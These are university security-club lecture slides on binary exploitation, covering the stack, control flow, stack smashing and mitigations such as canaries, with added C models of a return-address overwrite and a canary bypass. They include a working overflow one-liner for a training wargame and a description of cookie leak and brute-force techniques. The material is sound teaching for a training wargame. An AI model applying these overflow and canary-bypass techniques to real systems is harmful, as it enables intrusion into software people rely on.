RPISEC lecture notes - Computer Science Department


Security & Exploitation
Operating Systems
Fall 2014
RPISEC - 12/01/2014
OS Security
1
whoami
• Markus Gaasedelen
– B.S. Computer Science ’15
• Security Enthusiast
– I like to hack things
• President of RPISEC
– http://rpis.ec
RPISEC
• The Computer Security Club @ RPI
– http://rpis.ec
• The leading authority on campus for any and all things computer security related
• We compete in hacking competitions known as CTFs (Capture The Flag) and we’re very good at them
• We teach cool and applicable security skills at our weekly meetings
– 5-7pm Fridays, DCC 318
CSAW 2014 Finals
CSAW 2014 Awards
let’s get rolling…
WHAT IS SECURITY?
What is Security?
• Security == Hacking
– “Security” is just the ‘politically correct’ word for it
– “Cyber” is the buzzword
• Very technical and rewarding challenges
• Rarely taught or talked about in school ):
• Many different categories of security
Categories of Security
• Cryptography
• Web Security
• Vulnerability Research
• Binary Exploitation
• Reverse Engineering
• Malware Analysis
• Systems Security
• Embedded Hardware Hacking
• Network Security
• Digital Forensics
• Physical Security
• Pentesting
• …
The kind of stuff I’ll talk about today (: (see the next section)
MEMORY CORRUPTION
& BINARY EXPLOITATION
Binary Exploitation
• The simplest definition:
– Leveraging bugs in an executable to cause unintended, attacker-controlled actions
• Requires intimate knowledge of the language, the compiler, and the machine
Bugs Are Everywhere
• C is a ‘low level’ language
– Compiles straight to machine code (x86, ARM, etc.)
– Very fast
– Very fine control over the machine and memory
• It’s like driving a manual!
– Easy to do stupid things
The Unexciting Languages
• Binary exploitation isn’t really a thing for code written in managed or scripting languages
– C#, .NET, JavaScript, Lua, Python, etc.
– (the runtimes themselves are written in C/C++, so engine bugs are still fair game, but that is a different target)
• Slower, automate lots of stuff for you
– Driving an automatic
let’s dive right in and try breaking some stuff
WELCOME TO THE WARZONE
warzone.rpis.ec
ssh username/password
intro01:intro01
Getting Started / Tips
• cd /levels
• ./intro01
– Try feeding it a long run of A’s as input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
• python -c 'print "A"*20'
• gdb ./intro01
– run
– info functions
– info registers (short form: i r)
– disassemble <function> (e.g. disas main)
– break <function> (e.g. b main)
– break *<address> (e.g. b *0x08048455)
Stack Overview
• The stack is a region of memory a program uses to hold function variables, saved registers and return addresses during execution
• This is main()’s stack (figure)
Understanding the Stack (figure)
Corrupting the Stack (figure)
PWNING the Stack (figure)
Endianness
• Endianness – the byte order in which a multi-byte value is stored in memory
• Modern computers (x86, and ARM as usually configured) are little endian
– ‘little end in’: the least significant byte goes at the lowest address
• Endianness can be confusing, and I don’t want to get into the details
– 0x41424344 stored as 0x44, 0x43, 0x42, 0x41
– 0xdeadbeef stored as 0xef, 0xbe, 0xad, 0xde
• So a return address you write into a payload has to be byte-reversed
Intro01 Exploit
(python -c 'print "A"*64 + "\xef\xbe\xad\xde"'; cat) | ./intro01
• 64 bytes of padding reach the saved return address, then 0xdeadbeef is written little-endian
• The trailing `; cat` keeps stdin open after the payload, so you can keep typing at whatever the binary hands you
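The bytes that one-liner produces, and where they land, as an added C example that is not part of the RPISEC slides: the frame layout (a 64-byte buffer directly below the saved return address), the stand-in return address 0x08048455 and the inputs are constructed assumptions, since the page does not show intro01’s source. The overflow is modelled as a copy into a struct so the program demonstrates the overwrite without actually crashing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64
#define PAYLOAD_SIZE (BUF_SIZE + 4)

/* Assumed 32-bit frame layout (not taken from the intro01 binary, which the
 * slides do not show): a 64-byte local buffer sits directly below the saved
 * return address.  A real frame usually also holds the saved EBP; this layout
 * just mirrors the 64 bytes of padding in the slide's one-liner. */
struct frame {
    char buf[BUF_SIZE];
    uint32_t saved_ret;   /* the slot `ret` pops into EIP */
};

/* Little-endian store ("little end in"): 0xdeadbeef -> ef be ad de. */
static void put_le32(unsigned char *out, uint32_t v) {
    out[0] = (unsigned char)(v & 0xffu);
    out[1] = (unsigned char)((v >> 8) & 0xffu);
    out[2] = (unsigned char)((v >> 16) & 0xffu);
    out[3] = (unsigned char)((v >> 24) & 0xffu);
}

/* Same bytes as: python -c 'print "A"*64 + "\xef\xbe\xad\xde"'
 * Returns the payload length (68). */
size_t build_payload(unsigned char *out, uint32_t ret_addr) {
    memset(out, 'A', BUF_SIZE);           /* padding up to the return slot */
    put_le32(out + BUF_SIZE, ret_addr);   /* lands on saved_ret, byte-reversed */
    return PAYLOAD_SIZE;
}

/* The vulnerable pattern: attacker-controlled input copied into a fixed
 * buffer with no length check (strcpy/gets/read straight into buf).
 * The copy targets the whole struct so the demo stays in bounds instead of
 * corrupting the real stack; everything past byte 63 still lands in
 * saved_ret exactly as it would in the real frame.
 * Returns what `ret` would load into EIP afterwards. */
uint32_t smash_frame(struct frame *f, const unsigned char *in, size_t len) {
    f->saved_ret = 0x08048455u;           /* constructed stand-in for the real return address */
    if (len > sizeof(*f))                 /* the model ends at saved_ret */
        len = sizeof(*f);
    memcpy(f, in, len);                   /* no check against sizeof(f->buf) */
    return f->saved_ret;                  /* on a little-endian host: 0xdeadbeef */
}

/* Hardened form: reject input that does not fit, rather than truncating
 * silently or copying blindly. */
int safe_copy(struct frame *f, const unsigned char *in, size_t len) {
    if (len > sizeof(f->buf))
        return -1;
    memcpy(f->buf, in, len);
    return 0;
}

int main(void) {
    unsigned char payload[PAYLOAD_SIZE];
    struct frame f;
    size_t n = build_payload(payload, 0xdeadbeefu);

    printf("saved_ret after overflow:  0x%08x\n", smash_frame(&f, payload, n));
    printf("safe_copy of the same input: %d (rejected)\n", safe_copy(&f, payload, n));

    /* plain "A"*68 reproduces the slide's SEGFAULT at 0x41414141 */
    memset(payload, 'A', PAYLOAD_SIZE);
    printf("saved_ret after 'A'*68:    0x%08x\n", smash_frame(&f, payload, n));
    return 0;
}
```

Running this on an x86 box prints 0xdeadbeef for the crafted payload and 0x41414141 for the all-A input, which is exactly the address the later “SEGFAULT 0x41414141” slide shows in EIP. On a real target you replace 0xdeadbeef with an address that is actually mapped and executable, which is what the intro02 level is about.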
Bend it like Beckham
UNDERSTANDING CONTROL FLOW
Example ELF / EXE in Memory (animated figure: EIP steps through the executable’s .text segment, jumps out into libc for a library call, and comes back)
Runtime Memory (32-bit Linux, as drawn on the slide):
0x00000000 – Start of memory
Libraries (libc)
ELF Executable
– 0x08048000 – Start of .text segment
– .text segment (executable code; EIP points somewhere in here while your own code runs)
– .data segment
Heap
Stack
0xbfff0000 – Top of stack
0xFFFFFFFF – End of memory
How Calling Works (animated figure: EIP walks through the caller, hits a `call`, and lands in the callee)
• `call` pushes the address of the instruction after it (the return address) onto the stack, then sets EIP to the callee
• The callee’s prologue saves EBP and makes room for its locals below that return address
Returning (animated figure: EIP reaches the callee’s `ret` and jumps back to the caller)
• `ret` pops the saved return address off the stack into EIP, so execution resumes right after the `call`
• That return address lives on the stack right next to the callee’s local buffers, which is the whole point of the next section
Now that you know how it works …
OWNING CONTROL FLOW
Stack Smashing (animated figure: input overflows a local buffer and runs up the stack, past the saved return address)
Returning (animated figure: the callee reaches `ret` with a clobbered frame)
Returning home: `ret` pops the clobbered slot into EIP
SEGFAULT at 0x41414141: the saved return address was overwritten with “AAAA” (0x41 is ASCII ‘A’), and nothing executable is mapped at that address
“If your program simply segfaulted,
consider yourself lucky.”
-Chuck Stewart
Redirecting Control Flow (figure)
• Instead of 0x41414141, overwrite the saved return address with a code address of your choosing, and `ret` takes you there
warzone.rpis.ec
SSH in as intro02
use the password you got from solving intro01
Modern Protections
• Address Space Layout Randomization (ASLR)
• Data Execution Prevention (DEP)
• Stack Cookies (Canaries)
• Stack Rearrangement
• Relocation Read-Only (RELRO)
• FORTIFY_SOURCE
• These only make things harder, not impossible
– Take MBE if you want to know more about these
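How a stack cookie catches the intro01-style overflow, and why it only makes things harder, as an added C model that is not code from the slides or from ChatServer. The frame layout (cookie between the buffer and the saved EBP / return address, which is what gcc’s -fstack-protector arranges), the secret value and the attacker’s payload are constructed assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64
#define ATTACK_SIZE (BUF_SIZE + 12)

/* Assumed layout of a frame compiled with -fstack-protector (a model, not
 * taken from ChatServer): the cookie sits between the local buffer and the
 * saved EBP / return address, so a linear overflow has to trample it before
 * it can reach saved_ret. */
struct protected_frame {
    char buf[BUF_SIZE];
    uint32_t cookie;      /* copy of the per-process secret, written in the prologue */
    uint32_t saved_ebp;
    uint32_t saved_ret;
};

enum verdict { RET_OK = 0, RET_SMASHED = 1 };

/* Model of a protected function: the prologue stores the cookie, the body
 * does an unchecked copy, the epilogue compares the cookie before `ret`.
 * Returns RET_SMASHED where gcc's generated code would call __stack_chk_fail(). */
enum verdict protected_copy(struct protected_frame *f, uint32_t secret,
                            const unsigned char *in, size_t len) {
    f->cookie = secret;                 /* prologue (32-bit glibc: mov %gs:0x14,%eax; store to the cookie slot) */
    f->saved_ebp = 0xbfff0000u;         /* constructed stand-in values */
    f->saved_ret = 0x08048455u;
    if (len > sizeof(*f))               /* keep the model in bounds */
        len = sizeof(*f);
    memcpy(f, in, len);                 /* the stack smash: no check against sizeof(f->buf) */
    if (f->cookie != secret)            /* epilogue: cmp + jne __stack_chk_fail */
        return RET_SMASHED;
    return RET_OK;
}

/* Attacker payload aimed at saved_ret.  The cookie slot is rewritten with
 * whatever the attacker believes the cookie is: a guess gets caught, a leaked
 * value walks straight past the check.  The 32-bit fields are copied in host
 * byte order because that is the order the frame reads them back in. */
size_t build_attack(unsigned char *out, uint32_t cookie_guess, uint32_t ret_addr) {
    memset(out, 'A', BUF_SIZE);
    memcpy(out + BUF_SIZE, &cookie_guess, 4);
    memset(out + BUF_SIZE + 4, 'B', 4);           /* saved_ebp: don't care */
    memcpy(out + BUF_SIZE + 8, &ret_addr, 4);
    return ATTACK_SIZE;
}

int main(void) {
    unsigned char p[ATTACK_SIZE];
    struct protected_frame f;
    uint32_t secret = 0x3a9f1c00u;      /* constructed; glibc derives the real one from the kernel's AT_RANDOM bytes */

    build_attack(p, 0x41414141u, 0xdeadbeefu);
    printf("guessed cookie: %s\n",
           protected_copy(&f, secret, p, ATTACK_SIZE) == RET_SMASHED ? "detected" : "missed");

    build_attack(p, secret, 0xdeadbeefu);
    printf("leaked cookie:  %s, saved_ret=0x%08x\n",
           protected_copy(&f, secret, p, ATTACK_SIZE) == RET_OK ? "bypassed" : "detected",
           f.saved_ret);
    return 0;
}
```

Why this is only “harder”: the check fires only when the function returns, it only sees overflows that pass linearly through the cookie, and any information leak of the cookie (a format string bug, an over-read) lets the attacker rewrite it in place exactly as build_attack does. A fork()ing network server, which is what ChatServer is, hands every child the same cookie, so it can also be brute-forced one byte at a time by watching which children crash.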
Those were only educational challenges
LETS TRY SOMETHING REAL(ER)
Courtesy of Goldschmidt
CHATSERVER V3
ChatServer V3
• From NetProg (CSCI-4220)
• 32-bit Linux exploitation
• Vulnerable to a stack smash
– The compiler’s stack cookies save the day
• I’ll be demoing with cookies disabled; not exploitable otherwise ):
Courtesy of Goldschmidt
CHATSERVER V3 – DEMO
Windows 8.1 Exploitation (x64)
CSAW 2014 LINKS.EXE
links.exe
• Challenge from the CSAW 2014 CTF Finals
• 64-bit exploitation on Windows 8.1
• Basically all protections are on by default
• No source, lots of reversing :0
reversing is tedious
Windows 8.1 Exploitation (x64)
CSAW 2014 LINKS.EXE - DEMO
CSAW 2014 Finals
Wrapping up Binary Exploitation
• You might consider yourself a rockstar programmer, but you probably know nothing about secure coding practices or the implications of your mistakes
• Compilers go out of their way to prevent your bugs from causing catastrophic failure
• Just because your program doesn’t appear to segfault or crash doesn’t mean it is bug free or without vulnerabilities
• Binary exploitation is nothing like standard software development - I truly think of it as an art
welcome to the real world
JOB OPPORTUNITIES
…so…many…jobs…
• Typical titles / positions
– Information Security Analyst / Engineer
– Security Software Engineer
– Vulnerability Research Engineer
– Web Application Security Engineer
– Computer Network Operations
– Threat & Incident Response Engineer
– Product Security Reverse Engineer
– Malware Analyst / Reverse Engineer
– …
Entering the Job Market
• There are so few qualified security individuals that companies are totally starved ):
• Skilled in security & have a B.S. in CS?
– Government, Contractors, FFRDCs: $70k – $90k+
– Private / Commercial: $100k – ??
• Anything less and you’re missing out
Coming Soon - Spring 2015
MODERN BINARY EXPLOITATION
Modern Binary Exploitation
• An official class developed by RPISEC
• http://rpis.ec/binexp
• Class cap is raised to 50!
– Thank Goldschmidt & Stewart for getting us an awesome room that seats 50+, Walker 5113
– General registration re-opens December 8th
• Tuesday/Friday 2-4pm, Spring 2015
• DON’T MISS THIS!
– ZERO guarantee it’ll ever be offered again
Questions?
• [email protected]
• security.cs.rpi.edu/~gaasem
• @gaasedelen
• irc.rpis.ec 6667